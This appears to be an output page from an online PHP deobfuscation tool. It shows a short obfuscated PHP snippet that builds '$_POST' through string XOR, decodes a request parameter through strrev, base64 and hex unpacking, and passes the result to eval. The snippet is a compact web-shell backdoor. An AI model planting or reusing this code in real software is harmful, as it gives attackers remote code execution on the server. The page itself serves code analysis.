Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php header("HTTP/1.1 201 OK"); $a = "~+d()"^"!{+{}"; $b = ${$a}["a"]; $c=pack("H*",s..
Decoded Output download
<?php
header("HTTP/1.1 201 OK");
$a = "~+d()"^"!{+{}";
$b = ${$a}["a"];
$c=pack("H*",substr(base64_decode(strrev(substr($b,5))),2));
eval("p".$c);
?>
Did this file decode correctly?
Original Code
<?php
header("HTTP/1.1 201 OK");
$a = "~+d()"^"!{+{}";
$b = ${$a}["a"];
$c=pack("H*",substr(base64_decode(strrev(substr($b,5))),2));
eval("p".$c);
?>
Function Calls
header | 1 |
Stats
MD5 | 13f120633dea9f7b207e5443019b8e56 |
Eval Count | 0 |
Decode Time | 31 ms |